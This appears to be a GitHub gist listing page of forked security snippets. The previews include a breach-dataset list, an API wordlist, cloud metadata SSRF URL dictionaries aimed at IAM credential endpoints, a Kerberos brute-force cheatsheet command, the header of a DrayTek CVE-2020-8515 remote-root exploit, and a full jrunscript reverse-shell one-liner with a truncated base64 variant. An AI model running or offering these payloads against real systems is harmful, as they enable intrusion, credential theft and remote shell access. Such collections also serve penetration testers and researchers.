Skip to content

Instantly share code, notes, and snippets.

View m00zh33's full-sized avatar

m00zh33

62 followers · 296 following
View GitHub Profile
@m00zh33
m00zh33 / DataViper full list
Created June 7, 2021 02:15 — forked from campuscodi/DataViper full list
Gist created and used for ZDNet article: https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/
People Data Labs 1216656058
verifications.io 763574253
Collection 1 759264286
Exploit.in 733936374
Antipublic 561703015
Oxydata.io 406994204
MySpace 360713781
Cloud154 326105933
Exactis 298885050
Unknown Facebook data (204.12.215.107) 292717675
@m00zh33
m00zh33 / api_wordlist.txt
Created June 3, 2021 09:24 — forked from helcaraxeals/api_wordlist.txt
api wordlist
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents
@m00zh33
m00zh33 / Awesome_GitHub_OSINT.md
Created October 16, 2020 01:27 — forked from nil0x42/Awesome_GitHub_OSINT.md
Awesome GitHub OSINT
@m00zh33
m00zh33 / keybase.md
Created September 27, 2020 03:06

Keybase proof

I hereby claim:

  • I am m00zh33 on github.
  • I am m00zh33 (https://keybase.io/m00zh33) on keybase.
  • I have a public key ASDYU9FEHZjnaAWMC-v0gGE-H7-xqSyzu8DuEgf4nDQ9SAo

To claim this, I am signing this object:

@m00zh33
m00zh33 / CVE-2020-8515.go
Created March 30, 2020 02:28 — forked from 0xsha/CVE-2020-8515.go
CVE-2020-8515: DrayTek pre-auth remote root RCE
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
@m00zh33
m00zh33 / cloud_metadata.txt
Created November 26, 2019 02:17 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@m00zh33
m00zh33 / cloud_metadata.txt
Created November 26, 2019 02:16 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@m00zh33
m00zh33 / WAHH_Task_Checklist.md
Created November 26, 2019 02:13 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@m00zh33
m00zh33 / kerberos_attacks_cheatsheet.md
Created August 28, 2019 00:53 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@m00zh33
m00zh33 / JVM_POST_EXPLOIT.md
Created July 30, 2019 02:03 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V